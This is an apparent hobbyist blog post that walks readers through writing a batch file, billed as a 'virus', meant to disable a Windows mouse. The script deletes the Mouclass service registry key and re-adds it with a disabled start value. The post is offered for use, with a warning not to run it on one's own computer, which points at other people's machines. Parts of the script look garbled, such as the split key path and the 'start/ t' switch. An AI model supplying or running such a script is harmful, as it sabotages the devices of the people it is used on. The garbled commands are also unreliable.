I had Previously posted on marking different Batch file Like matrix effect,opening no of websites with one click which were interesting and completely harmless but today we will be marking a batch virus which is harm-full it will disable your mouse so think before trying it on yourself. Let get started with the main topic
How to Disable Mouse
Step 1: Open Notepad and copy the below codes
rem--------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system
\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v start/ t REG_DWORD /d 4
rem--------------------------
Step 2: Save this file as virus.bat
Step 3:Done you just created your virus.
Don't try this on your pc or computer else it will disable your mouse...
No comments:
Post a Comment